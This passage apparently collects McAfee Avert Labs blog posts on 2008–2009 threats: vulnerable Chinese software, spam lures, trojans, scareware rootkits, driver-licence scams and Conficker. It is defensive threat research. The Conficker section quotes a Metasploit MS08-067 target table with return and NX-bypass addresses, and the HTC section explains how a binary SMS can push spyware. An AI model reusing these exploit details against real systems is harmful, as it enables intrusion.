So what about that 1969 Rybovich? What about further curiosity based Googling? Next time you find yourself conducting such a search, do so with caution. Consider if the search result URLs all look similar. In this case, that is first red flag of caution. When you click to go to a link; does the content look like what you expected or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed onto red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

Everyday there are thousands of websites that have been injected with malicious code and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, and its features are easy-to-use, as well as free. Multiple buffer overflow in Baofeng2 Storm allow for the downloading and execution of files. CVE Number is CVE-2007-4816.
Reference:

http://www.baofeng.com/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. CVE Number is CVE-2007-4105.
Reference:

http://bar.baidu.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great deal of customers. Buffer overflows in Xunlei Web before version 5.6.3.44 can execute arbitrary code with the vulnerability. CVE Number is CVE-2007-5064.
Reference:

http://dl.xunlei.com/index.htm

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software base on p2p streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-4748.
Reference:

http://www.ppstream.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a kind of free game. It is a gaming platform that covers all the related fields and areas of network games. It has a category of nearly one hundred species of games, including Card games, leisure games, large-scale network and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module in the ConnectAndEnterRoom() method allows for the execution arbitrary code. Its CVE number is CVE-2007-5722.
Reference:

http://www.ourgame.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool. It’s similar to a PDF reader. Buffer overflows in the Ultra Star Reader allows for execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-5807.
Reference:

http://www.ssreader.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allows for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:

http://www.jetaudio.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as http, ftp and bit torrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:

http://www.xunlei.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

We’ve all read of social engineering tactics before and how gullible users fall prey to many tactics used by virus authors. As researchers we often give recommendations to family and friends on how not to fall prey to such tricks, but once in a while we need to remind ourselves too that we are included in the intended list of targets.

As researchers we deal with different flavors of malware. Over time and with experience researchers often reach a state of “enlightenment” where you look at a sample and you know if it’s malicious. At least that’s what we believe; however there are times where we too are made to think twice. When dealing with malware it’s not uncommon for analysts to come across a note from the authors once in a while. At times they are taunts and at times they are something more like the example below. We came across a sample which contains messages for security researchers asking to not add detections for the file as this is not a virus. Considering that there are legitimate packers that put warnings for researchers to prevent falsely detecting them, such non-verbal communication can at times make one take a second look.

Besides the fact that they seem to agree that they have authored this program , technically they are right – this is not a virus, but a trojan downloader !!  This trojan silently downloads arbitrary files (porn dialer in this particular case) from remote site (hxxp://[skipped].com/del/cmb_[random].exe) and executes it. (New detection added to detect both samples is “Generic.acf”)

A second example was a little more fascinating for us. Researchers often take two approaches to analysis: Static (opening up the file in Hiew or other similar tools) and Dynamic (replicating the malware). In this case we opened the file in Hiew and the first thing that was apparent was that the file had abnormal resources and import data.

Moving past this error, we also noticed that the Entry Point mentioned in the header is 0001A001 and for an Image Base of 00400000, we should be able to get Hiew to go to the EP which should be at 0041A001. However it looks like the file ends at 00410DFF causing Hiew to fail reaching EP.

At this point in our minds we are more or less sure that this file is corrupt and it could be the end of analysis, but WAIT !!! Though we may be certain the Windows Loader will complain if we attempt to execute this sample, it actually runs like a charm. OK things are getting really fishy, so back to the drawing board we go. We re-open the file up in Hiew and this time we observe in more detail, the section header.

There are 10 odd looking sections which is fine, some of the sections have Physical Size as 0 and others overlap which though suspicious is fine too. And then we stumble upon the possible culprit. The authors have modified the Physical Size of the first two sections to FF003000 and FF000200 respectively where as their Virtual Sizes are 3000 and 1000. Patching the section sizes to 00003000 and 00000200 fixes the EP issue in Hiew allowing it to get to the correct EP.

Heck even IDA wasn’t able to load the files and gave the following errors and quit: “Virtual Array: Address space limit reached”

Olly on the other hand mentions the large section size but still loads it comfortably.

Clearly the authors are attempting social engineering here by crafting the section table. A second opinion is also that using this technique might trick certain AV products to mis-load such files. We’d like to hear your thoughts too…..

So the moral of the story is, don’t judge a book by its cover or malware based on only one tool, drink more coffee and keep at it. Happy Researching !!  [We currently detect this as Spy-Agent.dp.gen]

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

An exploit found to be targeting a recently patched vulnerability for Internet Explorer 7 was discovered in-the-wild.  Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical with the possibility of a consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using word documents, we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This word document contains an embedded ActiveX control which upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Here’s another twist in regionally targeted attacks: A new Trojan (pretending to be a toolbar installer) is spreading that bundles the legitimate toolbar for the German social network “StudiVZ” with a variant of Backdoor-CEP. Among other malicious activities, the backdoor is capable of recording a user’s screen, taking screenshots, and logging keyboard strokes. At first glance, the deliberately modified installer looks perfectly harmless, especially because it refuses to do anything malicious if it detects certain security products or if it thinks it’s being observed through a sandbox or a debugger.

Behind the curtain, however, a lot of non-kosher things happen. The installer injects parts of the bundled malicious code into running processes or starts a legitimate process in suspended state, and then unmaps its content and remaps different, malicious content to the process before resuming it again. The malicious code is hard to detect because it is decrypted and injected into memory and never written to disk.

After the toolbar’s installer has finished, it automatically runs an instance of Internet Explorer to open http://studivz.net, which is the social network’s login site. With the newly installed toolbar clearly visible now through additional controls and logos on top, the user’s next step will most probably be to log into the social networking site.

At this point the backdoor has already infected a number of running processes in memory and installed a callback to capture and save any keystrokes.

The author of this variant of Backdoor-CEP seems to be particularly interested in the credentials of StudiVZ; the Trojan also makes periodic connection attempts to a host located in Germany. Fortunately for McAfee customers, the malicious installer is blocked by Artemis and is blocked at the (former Secure Computing) Web Gateway.

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture with two adorable Shih Tzu puppies is wishing a Happy Valentine’s Day. The text of the lure is advertizing a “Valentine Devkit” named loveexe.exe or start.exe. And regular readers can guess it already: This is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections nor downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs, plus blocked by Artemis, plus blocked at the (former Secure) Web Gateway as well.

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Since at least the year 2000, email scams have circulated around the net for the selling of International Driver Licenses. The authors explained that with their documents buyers could avoid having to pay traffic tickets as well as allowing them to establish new identities for hotel check-ins or bar entrance (if the buyers are underage). Lately these offers have put on weight.

Yesterday, I came across such an ad; it was in French and promoted a site offering a replacement driver license in place of a regular one:

Due to its name of (backdoordl), the website aroused my curiosity. I followed the link and, one thing leading to another, I discovered the extent of this fraud.

At backdoordl, I found a professional website divided into three areas: French, German and English.

In the UK area, I recognized text that was similar to what I first saw in French:

Have you lost your existing licence? No problem! Can’t remember the details? No problem! Need a clean licence? No problem! Need motorcycle, car, bus, hgv entitlement? No problem! Over 65? No problem! Medical problems? No problem!

There are 110 models of drivers licences in current use throughout the European Union, that’s not to mention drivers licences issued outside of the EU that are still accepted for exchange in different EU countries. This service is directed at any resident or non-resident of the United Kingdom or EU that wishes to obtain a full driving licence without any tests. So no matter what country you are a resident or citizen of, they claim they can help. Even if you live outside of the UK or EU! Once you have a driving licence through them, you can exchange it in your own country for a local licence. EU driving licences are accepted ‘as is’ worldwide for driving and exchange. It does not matter what nationality you are!

The office address, undoubtedly fake, written into the contact page was in the UK. There was no phone number; they said it would be provided only to clients who ordered. Despite some inconsistencies here and there, it was also explained the company did not accept any postal contact.  Because photo and signature were needed to create the new driving license, they had to be scanned by the buyer and then sent via email.

The registrar was ENOM Inc. and registration details protected via “WhoisGuard” service thus masking the true identity of the domain-name registrant and preventing public access to that information through its (and any) WHOIS database.

Getting on with my searches, I discovered the backdoordl site was not unique. Almost half a dozen nearly exact copies were also easily available online:

Domain registrants’ WHOIS information is also hidden or made with seemingly bogus data.

At backdoordl and its clones, prices seem consistent: £359 GBP or 399 Euros with payment encouraged via Western Union. There are two ways to obtain the documents:

First way is to exchange your current driving licence, you complete our application form and we print it out and translate some of your driving licence and translate the application form, put it all together and apply for an EU licence. This is a way to obtain driving categories that you select on the application form as the foreign issuing authority will look at the translation and not the licence.
The second way is to make a declaration that your licence has been lost/mislaid/stolen in a certain country that we know about. No other proof that you have even passed a test is required, just your sworn declaration. They will issue you with a temporary driving licence which we can then get translated and exchanged for an EU licence. SNEAKY? Yes, but Illegal? We have been advised NO.

Announced license process is said to take approximately 21 days.

I also discovered this language localization was not unique. During further searches, I found the AldaLegal offer and its clone, DLtransfer. Here too, these crocks speak your language. Sites are not only available in French, German, English, but also in Spanish and Chinese.

Here, the offer is better rounded and not limited to European Community:

For both sites, the company address written at the contact bottom pages is the same: in Australia (215 Harris St., Sydney NSW 2009). Using Google I got hold of a Word document at the bottom of a directory path: a standard letter perhaps used by the guy behind this rip-off. It would appear they also offer help for illegal immigration.

Finally, two other sites attracted me: eudriverlicence and licencetoday. Here too, the seller expresses himself without restraint:

They clearly explain the two ways to obtain such a license. As before, with the first one the buyer has to provide partial information of his actual license. As result, crocks promise an EU Driver License coming from one of the following countries: Cyprus, Czech Republic, Estonia, Hungary, Latvia, Lithuania, Malta, Poland, and Slovenia. The price is around 400 Euros.

With the second way, for applicants who do not or cannot submit any license details (only scanned photo and signature via email), the sites explain they can apply outside the European Union (Africa or a South American country):

All you need to do is check box A “Outside the E.U. Temporary Drivers Licence” on the application form and by ticking the box you declare you have had your licence lost/mislaid/stolen. Then by submitting the application along with further forms, which we submit, we can then obtain a temporary driving licence.

Here a 100 Euros extra-service cost is applied. In this case the total cost becomes 500 Euros.

These sites are not fully duplicated, but the texts look very similar. One company is Martin and Benn Associates. Its address is said to be in Gibraltar (Victoria House, 26 Main St.). The other is said to be in Germany.

At fraudwatchers, a contributor in Gibraltar went down to the alleged offices of Martin and Benn Associates. He didn’t find it, neither in the building, nor in the Gibraltar telephone book. To prove this, he provided the following picture:

The risks are numerous in a story like this. The first one: You are not assured to receive this document. For sure, your bank account will be debited, but getting the license in return is less certain. And fear the worst for your personal data (plus your photo, plus your signature) that you will send to these guys. This information would be perfect for making forged papers.

Depending on regional laws, it may or may not be legal for these companies to produce such documents and to sell them to you, but it may not be legal for you to carry them, or to use them as a driving license. At the drivers.com website, they provide the truth:

• An International Driving Permit is merely a translation of your regular driver’s license into almost a dozen languages.
• It is not a driver’s license by itself.
• You must still carry a valid, regular license from your country, even if you are also carrying an IDP.
• Yes, the United Nations created a treaty, now signed by about 150 countries, but the IDP is not a license by itself. It is mainly to help police read licenses written in other languages.
• You must purchase an IDP in your country of residence.
• You must have a legal license from your country of residence in order to get an IDP.
• No, you cannot use the IDP as a “license” inside your country of residence.
• No, you do not get a new, separate driving record with an IDP. They cannot be used to hide violations or tickets: These are still recorded on your regular driver’s license.
• Most countries authorize only certain organizations to sell IDPs. Check with your local government driver’s license authority.
• In the USA, only two organizations are allowed to sell real, legal IDPs: the American Automobile Association (enter your location carefully), and the American Automobile Touring Alliance, which offers IDPs through the National Automobile Club.
• In Canada, the only authorized distributor of legal IDPs is the CAA. Canadian IDPs are not valid in the USA.
• In the USA and Canada, the cost of a real IDP is about $10.

Being French, only one question left for me as I ended this post: Why do all these guys write “licence” with two “c’s”? I found the response in my dictionary: In the UK, “licence” is the noun and “license” is the verb. In American English, however, the noun is also spelled license. Another lead for the police .

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

However, our current count is not an absolute number of detected malware files; this can confuse many people. Drivers can be written very specifically, say one driver for one sample, but that’s not very effective. Most drivers are written to generically detect many samples. For example, one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is way higher then the half-million number reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

Initially VirusScan would focus just on true self-replicating viruses, mainly 8-bit (.com/.exe), MS-DOS viruses as well as boot viruses, which were prevalent then–and some still are today. Malware has evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (pe-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware is static Trojans.

There has also been a big shift by the malware authors. The first malware authors were hobbyists, writing to to prove it could be done, but today we mainly see malware that’s going after the money–password stealers, etc. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast amount of computers that have been controlled by zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

Recently I bought a new cell phone: the HTC Touch Pro. Great mobile phone. Opera Mobile Web surfing is handled great. The Sprint EV-DO Rev A network is fast and it’s the most stable smart phone I’ve had so far. As a security researcher naturally I had to dig deeper into how secure this mobile phone actually is. I quickly found out things that make me wonder if the mobile handset industry has learned anything from the desktop industry as far as protecting consumers.

The first thing I did was look at the default security settings of the mobile phone. Microsoft mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. These policies are also documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx along with the recommended settings to use as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone are, by default, different from the recommended settings. Below is the analysis on two of these changed policy settings:

SL Message Policy
Recommended Default: 2048 – SECROLE_PPG_TRUSTED
Value on HTC Touch Pro: 0000100c: 2112
Changed Value: (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

SI Message Policy
Recommended Default: 3072 – (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 0000100d: 3136
Changed Value: (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

These policy settings define WAP Push SI (Service Indication) and SL (Service Load). WAP was designed to be used by operators, administrators, and others to push software updates or even ringtones directly to the phone. For some unknown reason the HTC Touch Pro has broken from the recommended security policy and added a flag (SECROLE_USER_UNAUTH) that allows unauthenticated WAP Pushes from anyone. What does this mean? It means that an attacker can send a WAP push telling you to install spyware, like FlexiSpy, which gives them full control of your mobile handset. Once installed, the attacker can obtain your private data, your passwords, call logs, and even eavesdrop using the microphone. Sound familiar? And don’t think that it has to be a WAP push with a WAP gateway etc. That’s not the only impact these settings have. A specially crafted SMS can have the same effect as sending the WAP push through a gateway. A binary SMS message can contain a WAP SL Push (using SL as it can be used to force the downloading of spyware without user intervention or prompts) that instructs the mobile handset to go to a specific URL, get the spyware, and run the spyware after receiving it. In this case, all the attacker would need is the mobile handset phone number to send the binary SMS message to.

Further research showed that binary SMS doesn’t seem to work on Sprint’s CDMA network. Although, it is reported it does work on GSM networks such as AT&T. This makes me wonder what the default security policy is for WAP Pushes on AT&T’s version of the HTC Pro Touch, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies to the Microsoft recommended default value of 2048 and 3072 respectively. I use PHM Registry Editor although any registry editor for Windows Mobile can be used.

Shortcuts, or LNK files, are small binary files which have the path to an applications, sometimes with optional parameters. These files are used for running applications and are placed on folders where they are easy to access by users on such places as Desktops, and Application Launchers. The LNK files are also placed within the Startup folder to run automatically upon system boot. This indirect way of running applications is often attractive to malware authors as shortcuts have not been called out to most user’s attention for the sake of security as much as executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files/scripts in several different ways. Here, we introduce some methods we have recently seen:

1. Create shortcut files linking to malware files

This is an easy way to launch malware by a user’s actions or upon system reboot. These LNK files are created on the desktop, network shares, and even startup folders. One of the many variants of the Spy-Agent.bw trojan are known to take advantage of shortcuts to run.

2. Parasitic Infection to shortcuts

We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file to the original path.



The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs as well as executing the original file, all while running in the background. Ultimately users only see the application which was associated with the shortcut launch, thereby making it much harder for users to notice the infection.

3. Scripts in the shortcuts

Shortcuts can often contain scripts for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.



When users click on these LNK files, the scripts silently creates and drops ftp scripts to then download vbs scripts from the ftp severs. The downloaded vbs scripts are then responsible for downloading trojan files.

In the first 2 cases, shortcuts are just ways of launching malware whereas in the last case, these LNK files are standalone malicious files in which no other malicious executable files are needed but a legit “cmd.exe”. This type of LNK files can be attached to emails or hosted on the web sites. This implies that we need to be more careful with LNK files. Users can easily check shortcuts by browsing the file property or viewing the file with a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

It’s been a week since we’ve seen the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports about new Mac Trojans.

Before this we saw mostly lame malware for Mac OSX, but the iWork09 Trojan represents a new element to Mac Trojans — sophistication. This one contains peer to peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

One thing to remember when dealing with pirated software is that you might have a high price to pay, in this case ending up a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for “McAfee” on torrents sites, you will find a lot with serial numbers; but you won’t know whether the thing is a Trojan version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of Trojan versions of pirated Mac applications.

Take care — you often get what you pay for.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Fake alert malware prey on innocent victims by displaying misleading scan alerts. They trick the user into buying fake antivirus, to fix such falsely exaggerated scan reports. This class of “scareware” software depends on extreme social engineering tactics and comes bundled with Backdoors, Password Stealers, Downloaders, Droppers, Browser Helper Objects, etc.

Each of the above class of malware are used either in the distribution of the fake antivirus itself or in the propogation of other kinds of malware once the fake antivirus is installed on the victim’s machine. Working towards a common goal – extorting money from an innocent victim – these scareware applications have added a new class of malware to their armory – rootkits.

Apart from hiding the scareware’s files, rootkits ensure that access to genuine security vendors’ sites is disabled. The rootkit we noticed, named “tdss[random characters].sys” was blogged about by Computer Associates recently and was associated with the AntiSpywareXP2009 scareware. We, however, noticed that this rootkit was protecting rogue components belonging to WinWebSecurity scareware. This implies that:

1. The same author of the rootkit is supplying his code to multiple scareware vendors for money, or
2. The same group is creating and distributing multiple fake antivirus.

McAfee AV, will detect & clean this rootkit component from DAT version 5496 onwards. However, a user stuck with a machine that does not have antivirus with updated signatures, will have to clean this rootkit manually.

If you are a Windows user, apart from the usual safe computing practices that include using a firewall, an updated Windows operating system and an antivirus software, consider the following steps to minimize the chances of getting infected by such scareware:

1. Install a backup software, which can revert your system to a previous known uninfected state
2. Browse the Internet from sandbox software
3. Install and browse the Internet from a Virtual Machine

On a final note, the Federal Trade Commission has recently won a restraining order against Innovative Marketing and ByteHosting Internet Services – companies responsible for marketing the scareware applications WinFixer, WinAntivirus, DriveCleaner, ErrorSafe and XP Antivirus. However, we will have to wait to see if this move actually has any impact on curbing the distribution of scareware.

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap and are using an incorrectly protected PC that you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated from Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte order conversion of data in red box above, we get 3 addresses: 0×00020408, 0×6f8917c2, 0×6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
	{

                     'Ret'       => 0x6f88f807,
                     'DisableNX' => 0x6f8917c2,
                     'Scratch'   => 0x00020408
	}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

